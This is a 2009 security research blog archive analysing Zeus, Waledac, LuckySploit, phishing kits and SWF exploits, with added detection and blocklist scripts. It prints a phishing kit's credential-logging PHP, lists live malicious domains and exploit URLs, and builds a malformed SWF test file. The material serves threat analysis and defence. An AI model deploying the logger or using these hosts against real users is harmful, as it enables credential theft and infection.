Saturday, February 28, 2009

Rootkit Analytics: Updates

One more tool will be released by Ryan for Linux Kernel-mode rootkits, "SiD (Symbol Interception Detection)". We are still working on the content and the Windows User-mode Rootkit analysis tool by Naga.

The most probable release date would be Mar 8th, 2009.

- EF

Friday, February 27, 2009

LuckySploit, the right hand of Zeus

LuckySploit is the name of a set of scripts (a toolkit) designed to exploit different vulnerabilities and allow arbitrary binaries to be executed on the victim's computer.

Currently these scripts, which are obfuscated, are being used by the Zeus botnet to recruit zombie PCs through Drive-by-Download attacks.

When the site is accessed it only displays a blank page, but checking its source code reveals JavaScript code like this:

The script is encrypted with the RSA algorithm. This information is displayed at the end of the code.

Another interesting fact is that the script is served only once, i.e. if you reload the same address and check the HTML source code again, the script is no longer there.

Some of the domains that host LuckySploit are listed below:
r-state .com/ equi/
trafffive .cn/wait/ ?t=15
trafffive .cn/bm/ ?t=15
directlink9 .cn/wait/ ?t=15
directlink4 .cn/bm/ ?t=15
directlink2 .cn/wait/ ?t=15
directlink1 .cn/bm/ ?t=15
directlink0 .cn/wait/ ?t=15
superioradz .info/opis3/ ?t=2
superioradz .info/opis2/ ?t=2
rodexcom .org/parus/ ?t=5
dvlorg .net/parus/ ?t=25
top.sei-keine .com/u-store/ ?t=1
statclick .net/main/ ?t=1
deinglaube .com/ images/ tomi
federalreserve.banknetworks .net/bb/ ?t=2
fuadrenal .com/mito/ ?t=2
fuck-lady .com/prn/index .php
hello-to-you .net/rttz/ ?t=6

It's worth noting that many of these URLs are still active, so if you decide to access any of them, keep in mind the safety measures appropriate to the case.

In some scripts a message can clearly be read at the end:
attack_level = 0;;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';

In this way, Zeus adds the infected computer to its malicious network.

Related information:
Zeus botnet. Mass propagation of trojan. Part two - Spanish version
Zeus botnet. Mass propagation of trojan. Part one - Spanish version
Malware attack via Internet - Spanish version

# Jorge Mieres

Wednesday, February 25, 2009

Phishing Kit In-the-Wild for cloning of web site, version 2

A few days ago I wrote about a phishing kit in the wild: a package containing cloned copies of well-known, heavily used websites, ready to be deployed.

This package has now expanded its "coverage" of fraud, offering a second pack with a large number of fake websites that seek to be transparent to the user and obtain their information.

The phishing kit keeps the same distribution structure as the earlier pack, i.e. an index.html file that is a faithful copy of the real page, a login.php and a .txt file; what changes is the set of cloned sites offered for stealing data:

Adult Friend Finder
Playstation Underground
Tripod - Lycos
XTube - Images R Broken

On the one hand, strategies that seek to raise money without major effort are becoming more aggressive and more invasive; on the other hand, most of these kits are available online either for free or for a price, in this case a sum of money not as high as for similar packs.

Phishing attacks are becoming more dangerous because their creators strive for the copy to be as faithful as possible to the real site. Combined with intrusive techniques such as malware kits (ElFiesta, MPack, IcePack, etc.) implanted on ghost or compromised servers to disseminate phishing, this represents a growing risk for those unfamiliar with how these attack techniques work, and even for those who know them well.

Related Information
Phishing Kit In-the-Wild for cloning of web site

# Jorge Mieres

Tuesday, February 24, 2009

Zeus botnet. Mass propagation of trojan. Part two

In the first part, we covered in general terms what Zeus is, along with a short list of domains and IP addresses involved with the trojan that are very useful for blocking.

The map below shows information about each host infected by Zeus, identified by a point. Although at first glance the information shown on the map may seem inadequate, it must be remembered that each node can represent multiple IP addresses or domains hosted on one server, so the proportion of infected equipment is larger than it appears.

Although the list is very small compared with the number of domains that host Zeus, it is extremely important that administrators block them in their network infrastructure to avoid infection.

Furthermore, each of these domains, along with its IP address, represents an infected host or a compromised server.

Given that the infection vectors employed by Zeus are email and Drive-by-Download through different exploit kits (one of the best known being LuckySploit), as well as sites vulnerable to implanted malware kits such as ElFiesta, it is extremely important to block the domains and IP addresses I have outlined.

Related Information

Zeus botnet. Mass propagation of trojan. Part one

# Jorge Mieres

Monday, February 23, 2009

Spammers spreading malware through Oscar 2009 award messages

Freewebs is abused to spread the malware

hxxp:// Spreading HTTP Fake Codec

hxxp:// Spreading TROJ_FAKEAV.TJ

hxxp:// Js.downloader

hxxp:// 37 exploits


hxxp:// spreading Trojan-Downloader.Win32.FraudLoad.vkva (Detected by kaspersky)

Search tags:

oscar_winners,oscar awards,oscar_schedule,printable_oscar_ballot


rs_on_tv,oscar_live_stream,oscar_night, oscar_pre_show, oscar_coverage, what_time_do_the_oscars_start , what_channel_are_the_oscars_on , oscar_picks, what_channel_are_the_oscars_on, oscar_red_carpet_live, abc_oscars, oscar_odds, watch_oscars_online, miley_cyrus_oscars, oscars_2009_time, oscar_bingo, oscars_tonight, oscars_2009_time, oscar_predictions, 2009 Oscar winners,

- Analysis by Kalyan

Spyware Analytics: Forum to choose...

Spyware Analytics

We are in the process of finding out the best forum software to use. "Best" is a relative term, and always depends on what one is looking for. We are looking for:
* Security
* Usability
* Look & Feel
* Features

We looked at and other sites that give such comparisons. Many sites list Discusware and FuseTalk as the two most secure forum packages. We like the really cool look and feel of IP.Board from InvisionBoard, but being a security forum, we should give preference in the order of the four things listed above.

If you have any suggestions, experiences and more that you wouldn't mind sharing with us, contact us at contact.fingers @

- EF

Sunday, February 22, 2009

Malware Analytics: Status update - Releasing very soon

MalwareAnalytics portal is releasing in 2-3 weeks. The static part and backend is complete. We are almost about to complete the dynamic part. Thanks to Bonfa and his 2 friends for their hard work and dedication. We have also worked on load balancing, anti-reversing and anti-Virtual Machine Detection.

If you guys know any reliable and cost effective, dedicated-server hosting services or data centers, kindly contact us at contact.fingers @

- EF

Saturday, February 21, 2009

Google Groups again used to spread porn spam

Spamming techniques are becoming increasingly aggressive, and spammers, driven by the money behind unsolicited advertising, are focusing all their efforts on seeking "alternatives" to bypass the authentication mechanisms implemented by webmail servers.

Consequently, in recent days the mailboxes of millions of users have been bombarded with a significant amount of spam about erotic or pornographic videos of celebrities, using the Google Groups service to disseminate it.

Some of the subject lines used in this case to capture users' attention are:

Hey! It is Erica. Wanna date?
Hi! This is Dana from last Monday video shoot. Hello!
It is Norma. Couldn't reach you.
Jessica Alba was caught naked in sauna!
Jennifer Aniston was caught naked in sauna!
Jennifer Love Hewitt's nude beach photos!
Cameron Diaz's nude beach photos!
Denise Richards's fitting room hidden pics!
Shakira and her mystery boyfriend pics!
Hi! It is Deena. Fresh teens who just got legal to pose.
Hi! This is Amelia. Fresh teens who just got legal to pose.

On the other hand, some of the profiles used in the service in question are:

The list is too long to reflect every address in this post, but these examples are enough to give a sufficiently detailed idea that spam is a problem that affects everyone equally, and that this service is today one of the most exploited.

# Jorge Mieres

Detecting Kernel-Level Rootkits Through Binary Analysis

One of our new guys [Gustavo Delgadillo] mentioned this paper on LKM-based rootkit detection to EF. We thought of sharing it with our blog readers. Read and Enjoy!!!


Rootkits are tool sets used by intruders to modify the perception that users have of a compromised system. In particular, these tools are used by attackers to hide their actions from system administrators. Originally, rootkits mainly included modified versions of system auditing programs (e.g., ps or netstat on a Unix system). However, for operating systems that support loadable kernel modules (e.g., Linux and Solaris), a new type of rootkit has recently emerged. These rootkits are implemented as kernel modules, and they do not require modification of user space binaries to conceal malicious activity. Instead, the rootkit operates within the kernel, modifying critical data structures such as the system call table or the list of currently-loaded kernel modules.

This paper presents a technique that exploits binary analysis to ascertain, at load time, if a module's behavior resembles the behavior of a rootkit. Through this method, it is possible to provide additional protection against this type of malicious modification of the kernel. Our technique relies on an abstract model of module behavior that is not affected by small changes in the binary image of the module. Therefore, the technique is resistant to attempts to conceal the malicious nature of a kernel module.

Keywords: Rootkits, Binary Analysis, Kernel Hardening.

This paper is available here.

- EF

Xprobe2 PCAPs

Feb 2009 PCAPs have been released. Sorry for the delayed release. [Thanks to Kalyana.]

The PCAPs are available here.

For more on Xprobe, click here for the Blackhat '03 slides; the full PDF version of the formal paper is available here. Though this paper was released in 2003, the idea is still current and forward-looking. Thanks to Ofir Arkin, Fyodor Yarochkin and Meder Kydyraliev for their research.

If you find any glitches, errors or questions... contact us at contact.fingers @

- EF

Friday, February 20, 2009

Welcome our new blogger! - Joe from

Welcome our new blogger, Joe [Stefan Buehlmann]!!! Joebox is a simple sandbox application with a unique concept. It is designed for automatic behavior analysis of malware on Windows-based operating systems.

You could submit your binaries here for analysis.

The architecture of Joebox can be found here:
Version 5.0[Latest]
Version 4.0
Version 3.0
Version 2.0
Version 1.0

If you have any questions contact info @ and they would respond to your question.

- EF


Really cool paper on QEMU: "SecureQEMU: Encrypted Code Execution using Dynamic Binary Translation for Software Protection" is available here.

Thanks to Joe from for leading us to this interesting paper.

Read and Enjoy!!!

- EF

Attacks - Commonly exploited security weaknesses

Abstract: Over time, advances in technology and communication have led to the emergence of new attack vectors and new forms of crime that have turned the Internet and computer technologies into hostile territory for any kind of organization or person with equipment connected to the World Wide Web.

Unlike years ago, when people with extensive computer skills enjoyed researching these issues with the aim of gaining more knowledge, the scene has now been completely distorted, giving rise to new characters who use computer resources and their knowledge of how systems operate as tools to commit crime and obtain some economic benefit.

Every day new vulnerabilities are discovered and, usually, only those responsible for IT appreciate in its proper measure the importance of security and how to address the serious problem that lies behind vulnerabilities which allow an attacker to breach the security of an environment and commit crimes using the stolen data.

Click here to

- EF

Analysis of a web-based malware attack

Abstract: The Internet has become an allied attack platform for malware creators who, through the use of different techniques such as Drive-by-Download, Drive-by-Update, scripting and exploits, among others, and combinations of them, seek to recruit an entire army of computers that respond only to their malicious instructions.

These attacks, which use the Internet as the base for executing harmful payloads directly on the victim system, in parallel, almost instantaneously and transparently to the less experienced user, have become a latent and dangerous risk of infection through the simple act of accessing a website.

The following document presents a concrete example that relies on the actions mentioned above to exploit and infect a victim system, also describing several extra characteristics that increase the damage done by the malware.

Click here to

- EF

Thursday, February 19, 2009

SpywareAnalytics: Analytics forum for everyone...

Spyware Analytics

Security forum for researchers, engineers, analysts and home users to encourage discussions and provide solutions for spyware analytics and related questions. This is a futuristic project and requires dedicated volunteering. If you would like to be a part of this project, contact us at contact.fingers @ Before you send us an email, kindly:
* ensure that you are cool with dedicating few hours/week,
* ensure that you would consider this as one of your top priority tasks,
* ensure that you would not do this just for your resume.

- EF

Wednesday, February 18, 2009

Zeus botnet. Mass propagation of trojan. Part one

Speaking of phishing attacks or kits at this point in history is nothing new, nor is talking about malware infection techniques, which are increasingly sophisticated and increasingly aggressive; yet the spread of infection and fraud continues because, even today, it is a business, and apparently a very profitable one for those behind it.

Zeus (also known as Zbot or wsnpoem) falls squarely into the category of fraudulent and malicious code. It is basically a trojan designed to recruit zombie PCs and to carry out phishing attacks against financial institutions, banks and social networking sites, stealing email authentication data, FTP accounts, etc., combining techniques such as scripting and exploits, among others.

It's quite dangerous if we consider that, in addition to the typical actions of the malware, it can be obtained by anyone who deposits a certain amount of money in the account of its creators.

Perhaps this is one of the best reasons why so many variants of "Zeus" are In-the-Wild, looking for our systems to recruit as zombies. The truth is that, although it does not live up to its name, it is one of the largest botnets of the moment.

Even though this last position is threatened by other "alternatives" in the botnet world such as Waledac, the recent Adrenalin, or the smaller (in magnitude) Asprox (also known as Danmec), we really must be careful not to fall victim to these threats, which are always looking to successfully carry out their mission: to get our money and our computer resources.

Related information
Waledac more loving than ever Spanish version
Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs Spanish version

# Jorge Mieres

Trojan Analytics: Backend DB

(The new Logo)

Trojan analytics is portal that is aimed at research and analysis of Trojans. As mentioned in one of the previous blogs "Trojan Analytics - Coming Soon", Trojan analytics will be concentrating on different types of Trojans including [but not limited to] application-layer Trojans, Trojan backdoor, Trojan bots, Trojan rootkits, and more.

To put this together, we are talking to and other sites to create a back-end capable enough to help us in the analysis and classification of the Trojans we discover. Naming conventions, family tree/type classification, etc. are currently being sorted out.

- EF

Tuesday, February 17, 2009

Rootkit Analytics: Detection Techniques

Detection techniques can be classified into the following basic categories:
  • Signature-based Detection
  • Heuristics-based Detection
  • Comparison-based Detection:
    § Cross-view based Detection
    § Integrity-based Detection
We are currently reviewing existing tools and techniques, researching and building tools in these categories. Kindly, let us know if you think that we have missed any categories[email: contact.fingers @].

For more on our reviews and research, stay tuned.

- EF

Monday, February 16, 2009

Phishing Kit In-the-Wild for cloning of web site

One of the most common strategies for phishing attacks lies in site cloning, i.e. a fake page very similar to the real one, through which the attacker seeks to steal people's confidential and financial data over the Internet.

This phishing kit proposes just that. It is a set of web pages from popular sites ready to be uploaded to a ghost server and spread (by spam) with social engineering aimed, as it could not be otherwise, at exploiting the weakest link in the security chain: the human factor.

For the moment, and I say for now because those who distribute this kit will surely expand the range of cloned sites, the proposed phishing targets are:
EverQuest Forum (Packstation)

As you will see, many of the pages are heavily used and widely known.

Each of the folders containing a clone houses, in addition to index.html, a plain text file where the victim's captured information is stored, and a login.php which contains the following code:
<?php
header('Location: website');              // redirect the victim to the real site
$handle = fopen("log.txt", "a");          // open the log file in append mode
foreach($_POST as $variable => $value) {  // write every submitted form field
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    fwrite($handle, "\r\n");
}
fclose($handle);

Here header('Location: ...') redirects the victim to the real website, and $handle = fopen("log.txt", "a") opens the text file log.txt in append mode, so that every field submitted through the form is written to it.

Most of these clones are active, so it's necessary to be vigilant when accessing web sites that offer similar services.

On the other hand, it is clear that the kit was designed to commit fraud, and the fact that it is available on the Internet makes it even more dangerous, boosting the chances of becoming potential victims of these fraudulent actions.

# Jorge Mieres
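The login.php shown above has a recognisable shape: a redirect to the real site, a plain-text file opened for appending, and a loop that dumps every POST field into it. The following is an added example, not code from the post or the kit, of how a web host operator could sweep uploaded PHP files for that pattern. The two PHP sources it scans are constructed samples (one modelled on the logger described above, one an ordinary login handler); the indicator names and the threshold are assumptions of this example.

```python
import re

# Constructed sample PHP sources (not files from the kit on the page).
KIT_STYLE_LOGIN = r"""<?php
header('Location: http://example.com/login');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fclose($handle);
"""

BENIGN_LOGIN = r"""<?php
session_start();
$user = $_POST['user'] ?? '';
$pass = $_POST['pass'] ?? '';
if (check_credentials($user, $pass)) {
    $_SESSION['uid'] = $user;
    header('Location: /home');
}
"""

# Each indicator is a (name, regex) pair describing one behaviour of the kit's logger:
# redirect off-site, open a file for appending, iterate over all POST fields, write them.
INDICATORS = [
    ("external_redirect", re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I)),
    ("append_open",       re.compile(r"fopen\s*\([^)]*,\s*['\"]a\+?['\"]\s*\)", re.I)),
    ("dump_all_post",     re.compile(r"foreach\s*\(\s*\$_POST\s+as\b", re.I)),
    ("write_post_field",  re.compile(r"fwrite\s*\(\s*\$\w+\s*,\s*\$value\s*\)", re.I)),
]

def scan_php(source):
    """Return the names of the indicators that match a PHP source string."""
    return [name for name, rx in INDICATORS if rx.search(source)]

def looks_like_credential_logger(source, threshold=3):
    """True when at least `threshold` indicators fire (threshold is an assumption)."""
    return len(scan_php(source)) >= threshold

if __name__ == "__main__":
    for label, src in (("kit-style", KIT_STYLE_LOGIN), ("benign", BENIGN_LOGIN)):
        print(label, scan_php(src), looks_like_credential_logger(src))
```

A single indicator (a Location redirect, say) is common in legitimate code, which is why the verdict requires several to fire together; the obvious next step in production is to run scan_php over every .php file under the web root and review the hits by hand.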

Sunday, February 15, 2009

IRC Channel for EvilFingers Community

Community (contributors and users),
You are most welcome to join #evilfingers in freenode for any related discussions.

- EF

Rootkit Analytics - Part 2

As discussed in previous blogs, we are working on the different layers of rootkit analytics. The first version of our website [ - Coming Soon!!!] will be releasing by the end of Feb 2009. Stay Tuned!!!

We are looking for volunteers with the following specialties:
  • Processor/Microcode Experience
  • BIOS Programming Experience
  • Kernel Programming Experience

But, if you are experienced in rootkits or anything related to the same, kindly contact us as soon as possible, and we will work out a plan customized just for you.

- EF

Rootkit Analytics

Welcome to Rootkit Analytics!!!
User-mode Rootkit Analytics:
Our first tool in this category would be SpyDLL, which monitors injected processes and the modules injected into them. We also provide an option for the user to remove a DLL without shutting down the process, and an option to terminate the process itself. This tool will keep expanding, just like any other tool on our site.

Our next tool in user-mode rootkit analytics would be, WinInternals. This tool will give anything and everything required for a Windows based user-mode rootkit analytics that includes an extended edition of Process Memory Dumper[PMD].

Kernel-mode Rootkit Analytics:
Our first tool in this category would be ElfStat. More about this tool will be discussed in the near future.

The following are our members [sorted alphabetically] in Rootkit Analytics team so far:
Team Leads:
Kirk McGraw [Team Lead/Creator: WinInternals]
Nagareshwar Talekar [Team Lead/Creator: SpyDLL]
Ryan O'Neill [Team Lead/Creator: Elfstat]
Team Members:
Blake Hartstein [Team Member]

There are others whom we are still communicating with, for them to become a part of our team. The normal procedure of joining Rootkit Analytics is to either join EvilFingers in any of the teams and then once the member has proven their skills, they would be moved to any of our analytics divisions depending on their skill set. But we do consider direct volunteering for Rootkit Analytics division if you have prior hands-on anti-rootkit or related experience.

We are still working on expanding our research to other directions such as, application, hardware and firmware rootkits.

Contact us at contact.fingers @[because GMAIL rocks].

- EF

Saturday, February 14, 2009

Waledac more loving than ever

As I said in a previous post, Waledac is a worm whose main objective is to recruit zombie PCs and use their full distributed potential to propagate more malicious code and send more unwanted email.

For about a month, this worm has been spreading its campaign using as an excuse, and well in advance, the day of love celebrated today, February 14, worldwide.

Now, it seems to have saved its entire battery of visual social-engineering strategies for this day, renewing its whole repertoire by displaying the following images:

** More pictures

It has also changed the name of the binaries:

reader.exe MD5: A9286212E0D7B46841C860FD3F058DFA
patch.exe MD5: 1C5E4A7FCBE766133F743C9A0150373D
loveexe.exe MD5: 5C17F98919D2C84C3FD1908630396BB7
cardviewer.exe MD5: E2F9C7A76581047D493FDE2C4A02737A

As seen in the VT reports, Waledac currently has a low level of detection by antivirus signatures, i.e. not only has the repertoire of images changed but also the code of the binaries, which makes it even more dangerous.

# Jorge Mieres

Friday, February 13, 2009

Trojan Analytics - Coming Soon

Trojan analytics will be concentrating on different types of Trojans including [but not limited to] application-layer Trojans, Trojan backdoor, Trojan bots, Trojan rootkits, and more. We are looking forward to partner domains of similar interests.More details coming soon...

- EF

Thursday, February 12, 2009

Lavasoft ARIES Rootkit Remover

Similar to PrevX Gromozon remover, Lavasoft has a specialized Anti-Rootkit tool called the Lavasoft ARIES Rootkit Remover. Very simple to use and very fast in getting things done.

One click scan GUI:

Dialogue box indicating acceptance of critical action:

Ends with results page:

Now, how simple is that. It took less than 30 seconds for the entire scan process. This is a specialized tool, hence its time cannot be compared with the efficiency of other, generic anti-rootkit tools.

If you wish to volunteer for this project, kindly email us at contact.fingers @

- EF

Waledac, Social Engineering and Saint Valentine's Day

Malware uses current events, news or special circumstances as a method of deception to spread itself or other malicious code, and junk e-mail is one of the most commonly used attack vectors for this purpose.

Our mailboxes are examples that describe this situation. Valentine's Day (or its fans) is one of them, and if we look a little at the spam that inundates us, we see that much of it makes some reference to the upcoming celebration.

In fact, Waledac began its campaign well in advance, using as a spreading lure the typical image alluding to love, through which you download a binary called love.exe that, far from being loving, turns your computer into a zombie.

As a bonus, earlier this year, in addition to downloading the malware, the pages contained malicious exploits. Among the domains involved were:

googol-analisys .com
seocom .name
seocom .mobi
seofon .net
goog-analysis .com

Recently, however, the developers have migrated to another image that seeks the same degree of "tenderness" to get Waledac downloaded.

Some of the names used for the binary:

Waledac uses Fast-Flux networks, and some of the domains used to propagate it are:

adorelyric .com
adorepoem .com
adoresongs .com
alldatanow .com
alldataworld .com
bestadore .com
bestlovehelp .com
bestlovelong .com
cantlosedata .com
chatloveonline .com
cherishletter .com
cherishpoems .com
freedoconline .com
funloveonline .com
goodnewsdigital .com
losenowfast .com
mingwater .com
orldlovelife .com
romanticsloving .com
superobamaonline .com
theworldpool .com
topwale .com
wagerpond .com
whocherish .com
worldlovelife .com
worldtracknews .com
worshiplove .com
youradore .com
yourdatabank .com
yourgreatlove .com
yourteamdoc .com

Many compare it to other malicious code such as Nuwar (also known as Storm or the Storm worm) because of the similarity of their dissemination strategies and the malicious activities performed on the infected computer. However, the reality is that Waledac is a dangerous malicious code that has become one of the largest botnet networks of the time.

Related information:
Understanding Fast-Flux networks
Danmec Bot, Fast-Flux networks and recruitment of Zombie PCs

# Jorge Mieres
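The LuckySploit domain list earlier on this page, the Zeus posts' advice to block the listed domains, and the Waledac list just above all use the same defanging convention (a space inserted before the TLD, and elsewhere on the page an hxxp:// scheme), which has to be undone before the hosts can go into a blocklist. The following is an added example, not a tool from this blog, that normalises such entries into bare hostnames and renders them as a BIND Response Policy Zone fragment. The entries it parses are constructed samples in the same style, not copied from the lists above, and the zone name rpz.local is a placeholder.

```python
import re
from urllib.parse import urlsplit

# Constructed sample entries in the page's defanging style (not the real IoCs above).
SAMPLE_IOCS = """
example-one .cn/wait/ ?t=15
example-one .cn/bm/ ?t=15
http://www.example-two .cn/a1/f16 .swf
hxxp://example-three .com/images/ tomi
sub.example-four .net/bb/ ?t=2
example-five .com
"""

# A hostname: dot-separated LDH labels, at least one dot.
HOST_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+$")

def refang_host(entry):
    """Turn one defanged entry into a bare hostname, or None if none can be recovered."""
    s = entry.strip().lower()
    s = re.sub(r"^hxxps?://", "http://", s)   # hxxp:// -> http://
    s = re.sub(r"\s*\.\s*", ".", s)           # "domain .tld" -> "domain.tld"
    s = s.replace(" ", "")                    # leftover gaps inside paths
    if "://" not in s:
        s = "http://" + s                     # let urlsplit find the host part
    host = urlsplit(s).hostname
    return host if host and HOST_RE.match(host) else None

def build_blocklist(text):
    """Deduplicated, sorted hostnames recovered from a block of defanged entries."""
    hosts = {refang_host(line) for line in text.splitlines() if line.strip()}
    hosts.discard(None)
    return sorted(hosts)

def to_rpz(hosts, zone="rpz.local"):
    """Render hosts as an RPZ fragment; 'CNAME .' is the NXDOMAIN action."""
    lines = ["$ORIGIN %s." % zone]
    for h in hosts:
        lines.append("%s CNAME ." % h)
        lines.append("*.%s CNAME ." % h)   # also cover subdomains
    return "\n".join(lines)

if __name__ == "__main__":
    print(to_rpz(build_blocklist(SAMPLE_IOCS)))
```

Only the host is kept, never the path or query string, since the blocking decision is made at the resolver; paths such as /wait/?t=15 vary per campaign and are better kept as detection context in a separate feed.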

Wednesday, February 11, 2009

Panda Anti-Rootkit

Panda Security Anti-Rootkit Suite.

We will be collecting and analyzing rootkits pretty soon with preexisting toolkits such as these, and comparing the tools at various stages:

  • Preparation & Detection/Monitoring

  • Containment/Isolation

  • Eradication/Quarantine

  • Recovery/Patching

We will look at the various characteristics such as time taken and the overall cleaning process too.

To start with, Panda Anti-Rootkit opens with a one-click screen where users can scan for rootkits:

Once the user has chosen whether to allow auto-update or not, and whether to run an in-depth scan [which is recommended, since a simple scan may be faster, but what is fast is not always what is most effective], the software takes you to a reboot screen that lets the user restart the system so the changes take effect [it is recommended to reboot the system before the scan]:

Once the system reboots, the scanning process automatically starts with the following 6 layers of scan,

  • Running Processes

  • Windows Registry

  • User and kernel hooks

  • Services and Drivers

  • Files and ADS

  • Evaluating Incidents

Second snapshot, showing the progress of the scanning process:

When the process has come to an end a report gets listed as seen in the following image:

If you wish to participate or if you have questions, email us at contact.fingers @


Tuesday, February 10, 2009

Exploiting vulnerabilities through SWF

One of the formats used to massively exploit weaknesses in computers is the Small Web Format (.swf) file. Usually these files are injected with exploit code targeting a particular bug.

The same wave of file-based attacks using malicious JavaScript, mentioned in the post on vulnerabilities exploited through .js files, was combined with other alternatives such as this one.

In this case, it exploits a vulnerability in Adobe Flash Player described in CVE-2007-0071, by which a maliciously crafted .swf file causes a buffer overflow that allows code execution by a remote attacker.

This means that if the user accesses, for example, the URL http://www.710sese .cn/a1/, the file f16.swf (MD5: 95EC9202FBE74D508205442C49825C08) is executed; according to the VirusTotal report, it is detected by 18 of the 39 antivirus engines that scanned the sample. The exploit embedded in the .swf triggers the vulnerability if the application is installed and vulnerable.

Some of the URLs used to spread the exploit are:

http://www.710sese .cn/a1/f16 .swf
http://www.710sese .cn/a1/f28 .swf
http://www.710sese .cn/a1/f45 .swf
http://www.710sese .cn/a1/f47 .swf
http://www.710sese .cn/a1/f64 .swf
http://www.710sese .cn/a1/f115 .swf
http://www.710sese .cn/a1/i28 .swf
http://www.710sese .cn/a1/i16 .swf
http://www.710sese .cn/a1/i45 .swf
http://www.baomaaa .cn/a279/f16 .swf
http://www.baomaaa .cn/a279/f28 .swf
http://www.baomaaa .cn/a279/f45 .swf
http://www.baomaaa .cn/a279/f47 .swf
http://www.baomaaa .cn/a279/f64 .swf
http://www.baomaaa .cn/a279/f115 .swf
http://www.baomaaa .cn/a279/i28 .swf
http://www.baomaaa .cn/a279/i16 .swf
http://www.baomaaa .cn/a279/i45 .swf
http://000.2011wyt .com/versionff .swf
http://000.2011wyt .com/versionie .swf
http://sss.2010wyt .net/versionie .swf
http://sss.2010wyt .net/versionff .swf
http://www.misss360 .cn/versionff .swf
http://www.misss360 .cn/versionie .swf
.cn/a08_1272/m16 .swf
.cn/a08_1272/m28 .swf
.cn/a08_1272/m45 .swf
http://ccsskkk .cn/new7/fl/f16 .swf
http://ccsskkk .cn/new7/fl/f28 .swf
http://ccsskkk .cn/new7/fl/f45 .swf
http://ccsskkk .cn/new7/fl/f47 .swf
http://ccsskkk .cn/new7/fl/f64 .swf
http://1.ganbobo .com/template/kankan/js/4.0/curtain .swf
http://1.ganbobo .com/template/kankan/js/4.0/playerctrl .swf

Once the exploit runs on the victim's computer, it downloads the binary a1.css from http://d.aidws .com, a malicious code we have already mentioned in another post.

Related information:
Exploitation of vulnerabilities through JS

# Jorge Mieres
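CVE-2007-0071, cited above, is the Flash Player bug triggered through an out-of-range SceneCount in the DefineSceneAndFrameLabelData tag (tag code 86) of a crafted SWF. The following is an added example, not a tool from this blog, of the kind of structural check a gateway or mail filter can run on .swf attachments before they reach a player: it parses the SWF header (both uncompressed FWS and zlib-compressed CWS), walks the tag list, and flags a scene count that cannot be valid for the declared frame count. The two SWF files it inspects are built in the block itself as constructed test data, not real samples from the URLs above; the tag-walking and sanity bound are this example's own design.

```python
import struct
import zlib

SCENE_TAG = 86   # DefineSceneAndFrameLabelData
END_TAG = 0

def read_encoded_u32(buf, pos):
    """Decode the SWF EncodedU32 varint: 7 bits per byte, low bits first, max 5 bytes."""
    result, shift = 0, 0
    for i in range(5):
        b = buf[pos + i]
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result & 0xFFFFFFFF, pos + i + 1
        shift += 7
    raise ValueError("EncodedU32 longer than 5 bytes")

def iter_tags(body, pos):
    """Yield (code, payload) for each tag until the End tag or the end of the data."""
    while pos + 2 <= len(body):
        code_and_len = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:                      # long form: 32-bit length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        payload = body[pos:pos + length]
        pos += length
        yield code, payload
        if code == END_TAG:
            break

def inspect_swf(data):
    """Return a list of findings (empty when nothing looks wrong)."""
    findings = []
    sig, declared_len = data[:3], struct.unpack_from("<I", data, 4)[0]
    if sig == b"CWS":
        body = data[:8] + zlib.decompress(data[8:])   # header stays uncompressed
    elif sig == b"FWS":
        body = data
    else:
        return ["not a SWF file"]
    if declared_len != len(body):
        findings.append("declared length %d != actual %d" % (declared_len, len(body)))
    nbits = body[8] >> 3                              # RECT: 5-bit Nbits then 4 fields
    pos = 8 + (5 + 4 * nbits + 7) // 8                # skip the RECT
    frame_count = struct.unpack_from("<H", body, pos + 2)[0]
    pos += 4                                          # frame rate + frame count
    for code, payload in iter_tags(body, pos):
        if code == SCENE_TAG and payload:
            scene_count, _ = read_encoded_u32(payload, 0)
            # Every scene spans at least one frame, so this bound also catches values
            # that a signed 32-bit comparison would accept as negative.
            if scene_count > frame_count:
                findings.append("tag %d: SceneCount %d exceeds frame count %d"
                                % (code, scene_count, frame_count))
    return findings

def build_swf(tags, frame_count=1):
    """Assemble a minimal uncompressed SWF (constructed test data, not a real sample)."""
    body = b"\x00" + struct.pack("<HH", 12 << 8, frame_count)   # empty RECT, 12 fps
    for code, payload in tags:
        body += struct.pack("<H", (code << 6) | len(payload)) + payload
    body += struct.pack("<H", 0)                                  # End tag
    return b"FWS" + bytes([9]) + struct.pack("<I", 8 + len(body)) + body

def compress_swf(data):
    """Convert an FWS file into the zlib-compressed CWS form."""
    return b"CWS" + data[3:8] + zlib.compress(data[8:])

BENIGN_SCENE = bytes([1, 0]) + b"Scene 1\x00" + bytes([0])   # 1 scene, 0 frame labels
OVERSIZED_SCENE = b"\xff\xff\xff\xff\x0f"                    # SceneCount = 0xFFFFFFFF

if __name__ == "__main__":
    print(inspect_swf(build_swf([(SCENE_TAG, BENIGN_SCENE)])))
    print(inspect_swf(compress_swf(build_swf([(SCENE_TAG, OVERSIZED_SCENE)]))))
```

The check is deliberately structural rather than signature-based: the URLs above serve the same exploit under many file names, and a content filter keyed on the malformed tag catches all of them regardless of host or name.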

Monday, February 9, 2009

SpyDLL Eraser - Rootkit Analytics Tool

SpyDLL Eraser is our first tool release for our Rootkit Analytics domain.

Title : SpyDLL Eraser ( win32 GUI application)

Description : Tool to remove a specified DLL from one or more processes. Many trojan backdoors, rootkits, other malware and spyware inject their DLL into legitimate processes [explorer.exe, lsass.exe, etc.] to keep their activities hidden and to protect themselves from being killed. Some use DLL injection, while others use a plugin approach to get their DLL loaded into these legitimate processes. This tool helps distinguish between normal and malicious DLLs and helps the user erase them completely.

Features :
* List all running processes
* For each process following information to be displayed
+ process name
+ full path
+ company name
+ version
+ size
+ process start time
+ process memory details
+ modified/access date
* Display specific icons for different kind of processes such as
system processes, services
* For selected process, display all loaded DLLs with following information
+ DLL name
+ Full path
+ Company Name
+ Size
+ Load/.Reference Count
